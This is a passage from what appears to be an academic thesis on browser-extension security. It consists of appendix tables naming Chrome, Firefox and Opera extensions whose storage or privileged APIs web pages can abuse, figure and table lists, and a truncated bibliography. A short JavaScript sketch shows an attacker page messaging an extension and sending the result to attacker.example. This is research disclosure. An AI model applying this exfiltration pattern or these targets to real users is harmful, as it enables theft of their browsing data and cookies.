ngbcdblbfdpjgpmgfagkfofcjbnggfgn
pdhjoolhbkmlgjfedckdhiknnoabbnkk
hiejidhjgjpelfgldfhmnaoahnephhfg
icjlkccflchmagmkfidekficomdnlcig
Table A.5 – Extensions which give access to their storage to any application
eljhpoopiapggnlfcilpbihgbgbpnkgd
akhamklknibionleflabebgeikdookmp
hebabhddakflgmlhgefakkfkciijliie
ilgdjidfijkaengnhpeoneiagigajhco
ohdihpdgfenligmhnmldmiabdhflokkh
abenhehmjmoifipfpjeaejpbeeihnokp
ackpndpapmikcoklmcbigfgkiemohddk
ceogcehidijhepckebfifkpfogkajdkg
cgijoonmpaboophnagdckdcekmpfokel
dhcfokhhmhenbfmeflifppiedabfggkj
dhcmolikocplmafolinkncghmahimooh
eamjolanjdmgochipodfokkfjaeifhon
efhbachoakbcmbcmfffdgphbpcbldjac
fecipnolpdcmoidbjbnakpjgfikbnaik
gnnagpehbmfalanfjadamobejlldgedo
ijdfpccaiklfhpnamolipbjjijilmhli
khjhfgcimhcnaimdbgjbnbhcojkoceoc
niceocbendibobemckcagggppphheomc
okcfiidnmioajibmhhjpiomgejajiafa
pjjceionkajpednnegoanjjdlhbgkkpc
pjojmkmdealampgchopkfbejihpimjia
Table A.6 – Extensions which give access to their storage to specific applications
lpkhcobfjeidpkllbeagkkmmjgbmpfch mail.google.com
eggdmhdpffgikgakkfojgiledkekfdce mail.google.com
jmllflbhbembffempimjdbgnaodpoihh mail.google.com
jmlnhlclbpfcbkaoaegfigepaffoankc *.google.com,
gaoiiiehelhpkmpkolndijhiogfholcc netflix.com
ghldlmcbffbcnoofadgcapodmpiimflj netflix.com
jpgadigdffhcjldfkanacncocacekkie netflix.com/watch/
peiajekggpiihnhphljoikpjeaahkdcn beam.pro
bnfboihohdckgijdkplinpflifbbfmhm plug.dj
aclhfmpoahihmhhacaekgcbjaeojnifa wordix.io,
hcdfoeppbchkbbpplllggbjkkfokifej *.vk.com/feed/
hddnlanhlmifafibmlabomkkkobcmchj thankscoin.org
lhjajgnfmiliphkioedlmbfcdkhdhnkc *.service-now.com
bmdlalnebjigindhobniianfmhakfelf robertsspaceindustries.com,
dadggmdmhmfkpglkfpkjdmlendbkehoh openvideo.droppages.com
pbpfgdgddpnbjcbpofmdanfbbigocklj tweetdeck-enhancer
ilpkhojfiejdbkgcjbmllngjebdoehim *.phylotree.org
cfnjeahambijfdljfacldifapdcklhnj isogg.org
cjkbjhfhpbmnphgbppkbcidpmmbhaifa *.player.me
ddiaadobgihkgefcaajmkjgmnjakiamn auth.digitalkeyway.com
dienbdhbgkpddlgaceopelifcjpmkeha *.gestionderesidencias.es
dnpdkejhfeeipmklhlkdjaoakbkjkkjn datalane.io
gmjdaaahidcimfaipifeoekglllgdllb chat.stackexchange.com
kfodnoaejimmmphonklghkimhnhhgbce overlayBI.com
Table A.7 – Chrome, Firefox and Opera extensions that can be exploited by web applications to access privileged APIs and sensitive user information
Columns: extension unique identifier or name; web applications from which messages can be sent; target web applications to access; permissions (accessible privileged API)
Chrome Browser
fimckmjeammfdcpldmcigeojkkmeeian * * eval,host,storage,downloads
fidaihkgnbcbkkdaoebdionfjenegede * * eval,host,storage
hnkmipajjgbclkombnmigfnpekddlhlh * * eval,host,storage
fajjnmbcianlnhmngmabhgkmgdindlha * * eval,host,storage
efajnkcfjjkcodbhkhaigkffdleomnag * * eval,host
hoobpdoclliidciecjifpikpnopjpmkh * * eval,host
kjfjdocojijlledbaanbhpcnkoimghal * * eval,host
pfofjhnkanlacmgfgjohncmgemffkldl app.ringostat.com * eval,host,cookies,storage
gooecknlakggnppmhfpopneedjconjjp lionlock.com, * eval,host,storage
bdiogkcdmlehdjfandmfaibbkkaicppk *.delfa.com.br * eval,host,storage
pgbjjemkcflenaakhiehfdmcdnlnlpbl www.seejay.cloud * eval,host,storage
hdanmfijddamndfaabibmcafmnhhmebi *.hirogete.com, * eval,host
hpmeebiiihmjelpjmmemlihhcacflflc *.valleyge.com * eval,host
oejnkhmeilmiplpmenkegjaibnjbappo search.lilo.org, * eval,host
jkoegdibpkleifbkojmplebjhfllkckn search.uselilo.org, * eval,host
aopfgjfeiimeioiajeknfidlljpoebgc * * host,cookies
hlagecmhpppmpfdifmigdglnhcpnohib * * host
kpgdinlfgnkbfkmffilkgmeahphehegk * * host
bjjpnhdlhpfdebcbhdlmecafnokpjpce * * host
bmiedopcajpcehbbfglefijfmmndcaoa * * host
jegnjmcegcpodciadcoeneecmkiccfgi * * host
jnhibbjmekoijdjaopflcjbjieamifhh * * host
jpkfmllgncphdgojhkbcjidgeabaible * * host
ilcpdgfepihaomggobhmfiimflngbcoh starthq.com, * host,history
jpcebpeheognnbogfkpllmmdnimjffdb mail.google.com, * host,management
cnkgdfnjmgamkcpjdljdncfjcegpgcdg mail.google.com, * host,management
cfddhmlokgokhcmepddjooekhmgmgfld *.ok.ru * host,downloads
efhgmgomhamkkmjbgmcpgjnabcfpnaek *.ok.ru * host,downloads
djhfcchmdelggndcpkgbanfhnpbbijdb *.ok.ru * host,downloads
fhlkioimlijffnblckmdikkadobdmlgn *.apistop.com * host
angncidddapgcmohkdmhidfleomhmfgi logincat.com, * host
lndhlcaobijohmgoikmgpgbhepkbhpkl oneom.tk * host
olpheomfiimdonpboopcailehdagfhaa .g3user.com, * host
idkghekmllmjgnmbohakcddgcclanlca ln.io * host
mhdhcccejcjfanablmohbpdbepdkokkj *.gvt.com.br, * host
plfffminkgohddbooidppccppgelajfp mp.weixin.qq.com, * host
cboekbiaoabkhgjdclenjpipclabkdga *.apiary.io, * host
ekeefjfdbaakgbfbagacmckiedkmakem *.salesmate.io, mail.google.com, host
lbjbbkhljiimahdeknpckaoiinopofhl *.appspot.com mail.google.com, host
ijmbknjhacbaeeoamjajoolgjgdbpkko *.aliexpress.com, *.google.com, host
hihakjfhbmlmjdnnhegiciffjplmdhin mail.google.com linkedin.com, host
cfbodcmobhpfbjhbennacnanbmpbcfkd *.aliexpress.com, appfreaker.com host
ommfijfafanajffiijecdlfjlbgpmgpl *.treesnetwork.com, docs.google.com, host
okgfglgogpkomipfflpajohdkaflndoh ouramazinghome.com www.google.com host
iiabjaofopjooifoclbpdmffjlgbplod blog.renren.com *.github.com host
mcdjehgaflnlmilhefigdkldfdnembhk *.spotsetter.com *.amazonaws.com host
lfekjajdgncmkajdpiadkkhhpblngnlc sub.watch, zooqle.com, host
gkfpnohhmkonpkkpdbebccbgnajfgpjp squares.io/fetch, www.nytimes.com host
pkkbbimilpjmghfhhppamgigileopnkc * * cookies
5 Fabasoft extensions (See Table A.4) * current tab cookies
emiplbkkiabideffmpogkbbogkmofgph * - downloads
17 extensions (See Table A.2) vk.com, - downloads
eadbjnlpeabhbllkljhifinhfelhimha ok.ru - downloads
ngegklmoecgejlbkiieccocmpmpmfhim *.tribecube.com - downloads
iogibhaacmieogkdgebfbjgoofdlcmgb *.shutterstock.com - downloads
ooeealgadmhdnhebkhhbbcmckehpomcj animevost.org - downloads
dnohbnpecjinmdpeikpnmheeepnapfci vtop.vit.ac.in - downloads
pgmcojeijjhacgkkjaakdafmloncpema repl.it - downloads
hacopcfnbokiahlppemnlneooamldola hypem.com - downloads
bpkphnbpiagbpinglgejckickdgaghjo amer...matrix.com - history
fheihcbdclkdoeadmjfggiamjgkippli .my-lucky-star.net - topSites
llelondjpcjljnjihdflhpclcpbiaiba *.msn.com - topSites
6 Atavi Extensions (See Table A.3) atavi.com, - history,bookmarks,topSites
31 HD Wallpapers (See Table A.1) fliptab.io - history,bookmarks,management,storage
pnbfclligibfgdknphcodpbcejnkhffp * - bookmarks
eihbcgffjehfcgafjljohecmadcefoji app.launch.menu - bookmarks
empgohlokhdhhchkenknobacofijiffg app.launch.menu - bookmarks
aefmgkhgcmdljpfijlohmbhkhflmbmfi openoox.com - bookmarks
dhjhphjhpcelebeagllljbfpipdfkhgi .azurewebsites.net - bookmarks
jeabbgpkliknjiacfkfglknajloappkh yeahap.com, - bookmarks
22 Extensions (See Table A.5) * - storage
24 Extensions (See Table A.6) mail.google.com, ... - storage
Firefox Browser
guretv-ver-tv * * eval,host,storage
buxenger * * eval,host
bitbucket-server * * host
logincataddon logincat.com, * host
facebook-photo-zoom-easy www.facebook.com * host
facebook-photo-zoom www.facebook.com * host
markanabak-eklentisi *.markanabak.com, *.wipo.int, host
skimdaddy * skimdaddy.com host
the-trees-network *.treesnetwork.com, docs.google.com, host
assina-me * - downloads
liber-capital * - downloads
video-downloader-1 * - downloads
openvost animevost.org - downloads
youtube-video-download-convert *.youtube.com - downloads
openvideo droppages.com - storage
vgis *.vonage.com - storage
Opera Browser
bmjcngclkmgpfbjcmnbidognkoocpllm * * eval,host,storage
jnmcfakfglphcmgokeeoihifcenjjcgg * * eval,host
pmpnemphhmmpkcafgpdjanghiaadfbef *.ok.ru * host
mpaghnpkgmnikepcgjddhckcedapomkp *.ok.ru, *.vk.com, * host
bcabkcaakkjfdlodkolfagbdejhhkigp *.lazyrobin.ru * host
bidjmocompdljmeglljcoecikgogfjbb sub.watch, zooqle.com, host
aghgmcnoiflhcnfjkckofmjbeinjkena vk.com, - downloads
mhjbdafcpnoapkglmldoofhhbpnogehk vk.com, - downloads
hajlecmoacenahambneialopbpleihjn * - storage
lkdpdiepahdagdknbbjgnadholcdgfib tweetdeck-enhancer - storage
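As a reading aid for Table A.7, the following is a minimal, hypothetical sketch of the message-passing pattern these rows refer to: a web page sends a message that a vulnerable extension relays to its privileged background page. The extension identifier, the message format and the action names are illustrative assumptions and do not correspond to any listed extension.

// Hypothetical attacker page script (a minimal sketch; the extension id,
// the message format and the action names are illustrative assumptions,
// not taken from any extension listed in Table A.7).
const EXTENSION_ID = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; // placeholder id

// Path 1: reach a content script that relays page messages to the
// privileged background page of the extension.
window.postMessage({ action: "fetch", url: "https://victim.example/data" }, "*");
window.addEventListener("message", (event) => {
  if (event.source === window && event.data && event.data.response) {
    // Exfiltrate whatever the extension returned on behalf of the page.
    new Image().src = "https://attacker.example/log?d=" +
      encodeURIComponent(JSON.stringify(event.data.response));
  }
});

// Path 2: message the background page directly, when the extension declares
// the page's origin under the externally_connectable manifest key
// (Chrome and Opera only).
if (window.chrome && chrome.runtime && chrome.runtime.sendMessage) {
  chrome.runtime.sendMessage(EXTENSION_ID, { action: "getStorage" },
    (response) => console.log("extension storage:", response));
}

Whether such a message eventually reaches a privileged API depends on the columns above: the web applications an extension accepts messages from, the target applications it agrees to act upon, and the permissions held by its background page.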
List of Figures
2.1 Evolution of CSP adoption among top 10,000 Alexa Sites between April
2016 and April 2018 - Source [153]....................... 37
3.1 An XSS attack despite CSP. ........................... 39
3.2 Data Collection and Analysis Process ...................... 43
3.3 Percentage of pages with CSP per site ..................... 45
3.4 Differences in CSP directives for parent and iframe pages ........... 48
3.5 Differences in CSP directives for same-origin and relaxed origin pages . . . . 49
5.1 Monitoring CSP Enforcement .......................... 87
5.2 Performance overhead of deploying the monitor ................ 94
5.3 Overhead introduced by applying CSP to content ............... 95
6.1 Third Party Tracking ...............................107
6.2 Stateful tracking mechanisms ..........................108
6.3 Privacy-Preserving Web Architecture ......................111
6.4 Preventing trackers from combining in-context and cross-context tracking . 112
6.5 A demo page displaying a Google Maps widget ....................116
7.1 Results of general fingerprinting algorithm. Testing 485 carefully selected
extensions provides a very similar uniqueness result to testing all 16,743
extensions. Almost unique means that there are 2–5 users with the same
fingerprint. ....................................121
7.2 Detection of browser extensions and Web logins. A user visits a benign
website test.com which embeds third party code (the attacker’s script) from
attacker.com. The script detects an icon of the Adblock extension and con-
cludes that Adblock is installed. Then the script detects that the user is
logged into Facebook when it successfully loads Facebook’s favicon.ico. It
also detects that the user is logged into LinkedIn through a CSP violation
report triggered by a redirection from https://fr.linkedin.com
to https://www.linkedin.com. All these detections of extensions and logins
are invisible to the user. .............................122
7.3 Evolution of detected extensions in Chrome ..................125
7.4 Usage of browser extensions and logins by all users. ..............127
7.5 Distribution of anonymity set sizes for 16,393 users based on detected ex-
tensions and logins. ................................128
7.6 Four final datasets. DExt contains users, who have installed at least one
detected extension and DLog contains users, who have at least one login
detected. ......................................129
7.7 Anonymity sets for different datasets ......................130
7.8 Anonymity sets for users with respect to the number of detected extensions 130
7.9 Anonymity sets when JavaScript is disabled ..................131
7.10 Comparison of fingerprint pattern size (targeted) and the total number of
detected attributes (detected) for unique users. ................133
7.11 Anonymity sets for different numbers of attributes tested by general finger-
printing algorithm. ................................134
7.12 Uniqueness of users vs. number of unblocked third-party cookies ......136
7.13 Uniqueness of Chrome users based on their extensions only vs. number of
users - 204 is the number of users used in [245] and 854 the number of users
considered in [260]................................138
8.1 Browser extensions architecture - Communications with web applications . . 149
8.2 Methodology - static and manual analysis ...................152
8.3 Distribution of the number of users per extension ...............156
8.4 A.com forces an attack by opening B.com thereby allowing A.com/content
to load, execute and interact with extensions in order to exfiltrate user data
to A.com......................................166
9.1 CORS requests workflow in presence of an extension with the capability to
intercept and manipulate HTTP headers ....................171
9.2 CORS request blocked with CORSER deactivated ................176
9.3 CORSER allows CORS requests ..........................176
9.4 CORSER allows CORS requests with credentials .................177
9.5 Distribution of users of extensions with the capability to tamper with CORS
headers ......................................181
9.6 Distribution of users of extensions manipulating CORS headers . . . . . . . 182
9.7 Categories of extensions manipulating CORS headers .............183
9.8 Breaking legitimate CORS requests by adding multiple values to the Access-Control-Allow-Origin
header .......................................185
9.9 Breaking legitimate CORS requests with credentials by changing Access-Control-Allow-Origin
to *.........................................185
List of Tables
2.1 HTTP headers (excerpt) exchanged between the browser (client) and the
server for an access to https://www.google.com ............... 8
2.2 CORS headers exchanged between web browsers and servers. In many cases,
there is a one-to-one correspondence between request and response headers:
the browser sends a header, and the server uses its dual to authorize or
reject cross-origin requests ........................ 18
2.3 Excerpt of CSP directives and their descriptions ................ 23
3.1 Crawling statistics ................................ 45
3.2 Statistics of CSP violations due to Same-Origin Policy .............. 46
3.3 Sample of sites with CSP violations due to Same-Origin Policy ....... 46
3.4 Potential CSP violations in pages with CSP .................. 48
4.1 CSP directives by version ............................ 53
4.2 CSP Core Syntax ................................. 60
4.3 Formalization of Dependency-Free Policies (DF-CSP) considering CSP1,
CSP2 and CSP3 versions and their implementations in browsers. ...... 62
4.4 Rewriting Rules .................................. 66
4.5 Dependencies and rewriting rules considering only CSP2 and CSP3 and their
implementations in browsers ........................... 70
4.6 Dependencies and rewriting rules for CSP2 and CSP3, according to the spec-
ifications. We consider only browsers whose implementations are compliant
with the specifications .............................. 71
4.7 Dependencies in the wild, considering CSP1, CSP2, CSP3 and their imple-
mentations in browsers. ............................. 72
5.1 Matching arguments in an origin against arguments in a URL ........ 89
6.1 Third party content and execution context ...................108
6.2 Injecting dynamic third party content .....................112
7.1 Users filtered out of the final dataset ......................124
7.2 Previous studies on measuring uniqueness based on browser extensions and
our estimation of uniqueness. ..........................125
7.3 Normalized entropy of extensions and logins compared to previous studies. . 126
7.4 Top seven most popular extensions in our dataset and their popularity on
Chrome Web Store ................................127
7.5 Top seven most popular logins in our dataset and their ranking according
to Alexa ......................................128
8.1 Data overview ...................................155
8.2 Category of extensions ..............................156
9.1 Data collection and analysis results overview ..................179
9.2 Most requested permissions among Chrome, Firefox and Opera extensions . 179
9.3 Top 3 most popular categories among extensions with the ability to manip-
ulate HTTP headers ...............................180
9.4 Sources (origins of webpages) and targets (web application servers) of CORS
requests allowed by extensions. The table reads from row to column . . . . 182
9.5 User action to enable extensions .........................182
9.6 Extensions breaking the Same Origin Policy - Types of authorized CORS
requests ......................................184
9.7 Breaking web applications, because of a harsh modification of CORS headers
by extensions. ...................................185
A.1 Extensions with the same code base which give *.fliptab.io access to browsing
history (get/delete), bookmarks (get), extensions (get/enable/disable/uninstall)
and storage .................................196
A.2 Extensions with the same code base for triggering downloads from vk.com,
*.vimeo.com, *.coub.com, *.kinopoisk.ru ....................197
A.3 Extensions with the same code base which leak topSites, history and/or
bookmarks to *.atavi.com, *.atavi.test .....................197
A.4 Extensions with the same code base, provided by Fabasoft, which give access
to the current tab cookies ............................197
A.5 Extensions which give access to their storage to any application .......198
A.6 Extensions which give access to their storage to specific applications . . . . 199
A.7 Chrome, Firefox and Opera extensions that can be exploited by web appli-
cations to access privileged APIs and sensitive user information .........200
List of tools and websites
[1] A Monitor to Complement Content Security Policy (CSP) Expressiveness. https:
//swexts.000webhostapp.com/monitor/.
[2] Analyze Message Passing APIs in Browser extensions components. https://swexts.
000webhostapp.com/extsanalyzer/.
[3] Building Dependency-Free Content Security Policy (DF-CSP). https://swexts.
000webhostapp.com/dependencies/.
[4] CORSER - Cross-browser extension for tampering with HTTP CORS headers. https:
//github.com/mesolido/corser.
[5] Deploying Server-Side Tracking Protection Architecture. http://www-sop.inria.fr/
members/Doliere.Some/essos/deployment.html.
[6] Webstats - Various statistics about top 10,000 Alexa sites. https://webstats.inria.
fr/.
Bibliography
[1] Hypertext Transfer Protocol. https://www.ietf.org/rfc/rfc2616.txt.
[2] Microsoft Edge Extensions API. https://docs.microsoft.com/en-us/
microsoft-edge/extensions.
[3] A comprehensive tutorial on cross-site scripting. https://excess-xss.com/.
[4] Abstract Syntax Tree. http://esprima.readthedocs.io/en/4.0/
syntax-tree-format.html#expressions-and-patterns.
[5] Access-Control-Allow-Origin:* - Chrome Extension. https://
chrome.google.com/webstore/detail/allow-control-allow-origi/
nlfbmbojpeacfghkpbjhddihlkkiljbi.
[6] AdBlock - Block Ads - Browse Safe. https://getadblock.com/.
[7] Adblockplus official website. https://adblockplus.org/.
[8] AngularJS. https://angularjs.org/.
[9] APACHE HTTP SERVER PROJECT. https://httpd.apache.org/.
[10] Application programming interface. https://en.wikipedia.org/wiki/
Application_programming_interface.
[11] ASP.NET Web Framework. https://www.asp.net/.
[12] Asynchronous JavaScript + XML (AJAX). https://developer.mozilla.org/
en-US/docs/Web/Guide/AJAX.
[13] Atavi - bookmark manager. https://chrome.google.com/webstore/detail/
atavi-bookmark-manager/jpchabeoojaflbaajmjhfcfiknckabpo.
[14] Background Page. https://developer.mozilla.org/en-US/docs/Mozilla/
Add-ons/WebExtensions/manifest.json/background.
[15] Boomerang for Gmail - Chrome Extension. https://chrome.google.com/
webstore/detail/boomerang-for-gmail/mdanidgdpmkimeiiojknlnekblgmpdll.
[16] Brave browser. https://brave.com/.
[17] Browser Console. https://developer.mozilla.org/en-US/docs/Tools/Browser_
Console.
[18] Browser History. https://chrome.google.com/webstore/detail/
browser-history/bpkphnbpiagbpinglgejckickdgaghjo.
[19] Browsing Contexts. https://www.w3.org/TR/html51/browsers.html.
[20] Bug 1372288 - webextensions uuid can be used as user fingerprint. https://
bugzilla.mozilla.org/show_bug.cgi?id=1372288.
[21] Can I use Content Security Policy 1.0 (Known issues). https://caniuse.com/
#search=content%20security%20policy.
[22] Cascading Style Sheets. https://www.w3.org/Style/CSS/.
[23] Chrome - Publish in the Chrome Web Store. https://developer.chrome.com/
webstore/publish.
[24] Chrome Extensions. https://chrome.google.com/webstore/category/
extensions?hl=en-US.
[25] Chrome Extensions API. https://developer.chrome.com/extensions.
[26] Chrome Extensions API - Content scripts and Content Security Policy. https:
//developer.chrome.com/extensions/contentSecurityPolicy.
[27] Chrome Platform Status. https://www.chromestatus.com/metrics/feature/
popularity#DocumentSetDomain.
[28] Chrome WebRequest API. https://developer.chrome.com/extensions/
webRequest.
[29] CLIQZ. https://cliqz.com.
[30] CloudExtend Gmail for NetSuite - Chrome Extension. https:
//chrome.google.com/webstore/detail/cloudextend-gmail-for-net/
fbaloimemjelmonlpfnmiipkeldlnnbl.
[31] Content Security Policy - Firefox Extensions. https://developer.mozilla.org/
en-US/docs/Mozilla/Add-ons/WebExtensions/Content_Security_Policy.
[32] Content Security Policy (CSP) - Chrome Extensions. https://developer.chrome.
com/extensions/contentSecurityPolicy.
[33] CORS - Mozilla Developer Network. https://developer.mozilla.org/fr/docs/
Web/HTTP/CORS.
[34] CORS protocol - Fetch Specification. https://fetch.spec.whatwg.org/
#http-cors-protocol.
[35] CORS Toggle - Opera Extension. https://addons.opera.com/en/extensions/
details/cors-toggle/.
[36] CORSER extension on Chrome. https://chrome.google.com/webstore/detail/
corser/elgclnafddmkhhnhlfgfahgbahkginga.
[37] CORSER extension on Firefox. https://addons.mozilla.org/en-US/firefox/
addon/corser-addon/.
[38] CORSER extension on Opera. https://addons.opera.com/en/extensions/
details/corser-authorize-cors-requests/.
[39] Cross-Origin Communications. https://developer.mozilla.org/en-US/docs/
Web/API/Window/postMessage.
[40] Cross-origin-resource sharing. https://developer.mozilla.org/en-US/docs/Web/
HTTP/Access_control_CORS.
[41] Cross-Site-Scripting. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS).
[42] CSP violations online. https://webstats.inria.fr?cspviolations.
[43] CSS Font Loading API. https://developer.mozilla.org/en-US/docs/Web/API/
CSS_Font_Loading_API.
[44] CSS Parser for Node.js. https://github.com/reworkcss/css.
[45] Data URI scheme. https://en.wikipedia.org/wiki/Data_URI_scheme.
[46] Disable CORS - Chrome Extension. https://chrome.google.com/webstore/
detail/disable-cors/mghlhnfeimllfjdpacagfdmchnhbgfeh.
[47] Disconnect. https://disconnect.me/.
[48] Document Object Model (DOM). https://developer.mozilla.org/en-US/docs/
Web/API/Document_Object_Model.
[49] Document.cookie. https://developer.mozilla.org/en-US/docs/Web/API/
Document/cookie.
[50] ECMAScript® 2017 Internationalization API Specification (ECMA-402, 4th Edition,
June 2017). https://www.ecma-international.org/ecma-402/4.0/.
[51] eRail.in Chrome extension. https://chrome.google.com/webstore/detail/
erailin/aopfgjfeiimeioiajeknfidlljpoebgc.
[52] Extensions and the add-on ID. https://developer.mozilla.org/en-US/docs/
Mozilla/Add-ons/WebExtensions/WebExtensions_and_the_Add-on_ID.
[53] Facebook website. https://www.facebook.com/.
[54] Fetch Specification. https://fetch.spec.whatwg.org/.
[55] Fetch Specification. https://fetch.spec.whatwg.org/.
[56] Firefox - Submitting an add-on. https://developer.mozilla.org/en-US/docs/
Mozilla/Add-ons/Distribution/Submitting_an_add-on.
[57] Firefox - Web Accessible Resources. https://developer.mozilla.org/en-US/
docs/Mozilla/Add-ons/WebExtensions/manifest.json/web_accessible_
resources.
[58] Firefox Add-ons. https://addons.mozilla.org/en-US/firefox/.
[59] Firefox WebRequest API. https://developer.mozilla.org/en-US/docs/
Mozilla/Add-ons/WebExtensions/API/webRequest.
[60] Firefox webRequest.onBeforeSendHeaders. https://developer.mozilla.
org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/webRequest/
onBeforeSendHeaders.
[61] Ghostery. https://www.ghostery.com/.
[62] Google Chrome browser. https://www.google.com/chrome/.
[63] Google. Manifest - Web Accessible Resources. https://developer.chrome.com/
extensions/manifest/web_accessible_resources.
[64] Google. Manifest File Format. https://developer.chrome.com/extensions/
manifest.
[65] Google website. https://www.google.com/.
[66] Google’s Gmail. https://gmail.com.
[67] GureTV: To watch television - Firefox Extension. https://addons.mozilla.org/
en-US/firefox/addon/guretv-ver-tv/.
[68] HD Wallpapers from fliptab.io. http://www.fliptab.io/.
[69] HTML Parser for Node.js. https://github.com/tmpvar/jsdom.
[70] HTML Standard. https://html.spec.whatwg.org/.
[71] HTML5 Specification - W3C. https://www.w3.org/TR/html5/forms.html.
[72] HTTP Commander - Chrome Extension. https://chrome.google.com/webstore/
detail/http-commander/emiplbkkiabideffmpogkbbogkmofgph.
[73] HTTP Cookies. https://developer.mozilla.org/en-US/docs/Web/HTTP/
Cookies.
[74] Http cookies. https://developer.mozilla.org/fr/docs/HTTP/Cookies.
[75] HTTPS. https://en.wikipedia.org/wiki/HTTPS.
[76] Iframe Sandbox Attribute. https://www.w3.org/TR/2011/WD-html5-20110525/
the-iframe-element.html#attr-iframe-sandbox.
[77] ISOGG Y-Tree AddOn - Chrome Extension. https://chrome.google.com/
webstore/detail/isogg-y-tree-addon/cfnjeahambijfdljfacldifapdcklhnj.
[78] Iwassa - Chrome Extension. https://chrome.google.com/webstore/detail/
iwassa/hnkmipajjgbclkombnmigfnpekddlhlh.
[79] IWASSA - Opera Extension. https://addons.opera.com/en/search/?query=
bmjcngclkmgpfbjcmnbidognkoocpllm.
[80] Javascript - mozilla developer network. https://developer.mozilla.org/bm/docs/
Web/JavaScript.
[81] JavaScript Object Property Access - Dot and Array Notation. https:
//developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/
Property_Accessors.
[82] JavaScript Proxy. https://developer.mozilla.org/en-US/docs/Web/
JavaScript/Reference/Global_Objects/Proxy.
[83] JavaScript scope. https://developer.mozilla.org/en-US/docs/Glossary/Scope.
[84] jianlibao - Chrome Extension. https://chrome.google.com/webstore/detail/
jianlibao/fimckmjeammfdcpldmcigeojkkmeeian.
[85] jQuery. http://jquery.com/.
[86] Lastpass official website. https://www.lastpass.com/business.
[87] LinkClicker - Chrome Extension. https://chrome.google.com/webstore/detail/
linkclicker/hoobpdoclliidciecjifpikpnopjpmkh.
[88] LinkClicker - Opera Extension. https://addons.opera.com/en/search/?query=
jnmcfakfglphcmgokeeoihifcenjjcgg.
[89] LinkedIn Sales Navigator - Chrome Extension. https://
chrome.google.com/webstore/detail/linkedin-sales-navigator/
hihakjfhbmlmjdnnhegiciffjplmdhin.
[90] Linkedin website. https://www.linkedin.com/.
[91] Man-in-the-middle attack. https://en.wikipedia.org/wiki/
Man-in-the-middle_attack.
[92] MegaTest - Opera Extension. https://addons.opera.com/en/extensions/
details/megatest-uznat-rezultat/.
[93] Message Passing - Google Chrome Extensions. https://developer.chrome.com/
extensions/messaging.
[94] Microsoft Edge Extensions. https://www.microsoft.com/en-us/store/
collections/edgeextensions/pc.
[95] Microsoft Internet Information Services (IIS). https://www.iis.net/.
[96] MIME types. https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_
of_HTTP/MIME_types.
[97] ModernDeck - Chrome Extension. https://chrome.google.com/webstore/detail/
moderndeck/pbpfgdgddpnbjcbpofmdanfbbigocklj.
[98] ModernDeck - Opera Extension. https://addons.opera.com/en/search/?query=
lkdpdiepahdagdknbbjgnadholcdgfib.
[99] MongoDB. https://www.mongodb.com/.
[100] Mozilla WebExtensions API. https://developer.mozilla.org/en-US/Add-ons/
WebExtensions.
[101] multiDownloader - Chrome Extension. https://chrome.google.com/webstore/
detail/multidownloader/dnohbnpecjinmdpeikpnmheeepnapfci.
[102] MutationObserver API. https://developer.mozilla.org/en-US/docs/Web/API/
MutationObserver.
[103] MySQL Database. https://www.mysql.com/.
[104] NGINX. https://www.nginx.com/.
[105] Node.js. https://nodejs.org/en/.
[106] Node.js Proxy. https://newspaint.wordpress.com/2012/11/05/
node-js-http-and-https-proxy.
[107] Opera - Passing Messages in Extensions. https://dev.opera.com/extensions/
message-passing/.
[108] Opera Add-ons. https://addons.opera.com/en/extensions/.
[109] Opera browser. http://www.opera.com/.
[110] Opera Extensions API. https://dev.opera.com/extensions/.
[111] Oracle Database. https://www.oracle.com/index.html.
[112] Phishing Attack. https://en.wikipedia.org/wiki/Phishing.
[113] PHP: Hypertext Preprocessor. http://php.net/.
[114] PhyloTreeMT AddOn - Chrome Extension. https://chrome.google.com/
webstore/detail/phylotreemt-addon/ilpkhojfiejdbkgcjbmllngjebdoehim.
[115] PostgreSQL Database. https://www.postgresql.org/.
[116] PostMessage - Cross-Origin Iframe Secure Communication. https://developer.
mozilla.org/en-US/docs/Web/API/Window/postMessage.
[117] Privacy Badger. https://www.eff.org/fr/privacybadger.
[118] Publishing Guidelines - Opera Extensions. https://dev.opera.com/extensions/
publishing-guidelines/.
[119] Python Programming Language. https://www.python.org/.
[120] renren-markdown - Chrome Extension. https://chrome.google.com/webstore/
detail/renren-markdown/iiabjaofopjooifoclbpdmffjlgbplod.
[121] repl.it download - Chrome Extension. https://chrome.google.com/webstore/
detail/replit-download/pgmcojeijjhacgkkjaakdafmloncpema.
[122] Reverse Proxy. https://en.wikipedia.org/wiki/Reverse_proxy.
[123] Ringostat dialer. https://chrome.google.com/webstore/detail/
ringostat-dialer/pfofjhnkanlacmgfgjohncmgemffkldl.
[124] SalesforceIQ CRM. https://chrome.google.com/webstore/detail/
salesforceiq-crm/jpcebpeheognnbogfkpllmmdnimjffdb.
[125] Same Origin Policy. https://developer.mozilla.org/en-US/docs/Web/
Security/Same-origin_policy.
[126] Secure Hash Algorithms. https://en.wikipedia.org/wiki/Secure_Hash_
Algorithms.
[127] Server Side Access Control (CORS). https://developer.mozilla.org/en-US/
docs/Web/HTTP/Server-Side_Access_Control.
[128] Service Worker API. https://developer.mozilla.org/en-US/docs/Web/API/
Service_Worker_API.
[129] Session Hijacking Attack. https://www.owasp.org/index.php/Session_
hijacking_attack.
[130] SlimerJS - A scriptable browser for Web developers. https://slimerjs.org/.
[131] Space Galaxy HD Wallpapers - Chrome Extension. https://
chrome.google.com/webstore/detail/space-galaxy-hd-wallpaper/
dkpndikhfepllbpaafgcelembimabofo.
[132] StartHQ. https://chrome.google.com/webstore/detail/starthq/
ilcpdgfepihaomggobhmfiimflngbcoh.
[133] Telerik Test Studio Chrome Playback 2014.1. https://
chrome.google.com/webstore/detail/telerik-test-studio-chrom/
pkkbbimilpjmghfhhppamgigileopnkc.
[134] The Basics of Browser Helper Objects. https://blogs.msdn.microsoft.com/
askie/2007/12/07/the-basics-of-browser-helper-objects/.
[135] The OWASP Top Ten Project. https://www.owasp.org/index.php/Top_10_
2013-Top_10.
[136] Tor Browser. https://www.torproject.org/projects/torbrowser/design/.
[137] Tracking Compliance and Scope. https://www.w3.org/TR/tracking-compliance/.
[138] Tracking Preference Expression. https://www.w3.org/TR/tracking-dnt/.
[139] uBlock Origin. https://www.ublock.org/.
[140] uBlock Origin - Chrome Extension. https://chrome.google.com/webstore/
